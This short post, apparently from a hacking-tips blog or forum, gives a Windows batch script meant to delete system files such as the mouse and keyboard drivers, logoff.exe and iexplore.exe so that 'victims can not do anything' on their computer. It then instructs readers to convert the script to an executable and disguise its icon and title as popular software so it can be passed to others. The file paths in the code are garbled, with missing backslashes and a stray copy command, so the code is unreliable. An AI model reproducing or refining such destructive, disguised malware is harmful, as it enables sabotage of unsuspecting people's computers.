It will delete explore.exe, logoff, mouse, keyboard files. So victims can not do anything in/on his computer. NOTE: Don't run or execute the bat file after creating it because it will delete the files from your computer only. 1. Copy the code present in box below in the NOTEPAD.CODE@echo off @if exist c:windowssystem32mouse del c:windowssystem32mouse @if exist c:windowssystem32keyboard del c:windowssystem32keyboard copy C:windows @if exist c:windowssystem32logoff.exe del c:windowssystem32logoff.exe @if exist C:program filesinternet exploreriexplore.exe del C:program filesinternet exploreriexplore.exe2. Save the file with .bat extension(for eg:deleteall.bat) 3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.
any problem cooment here????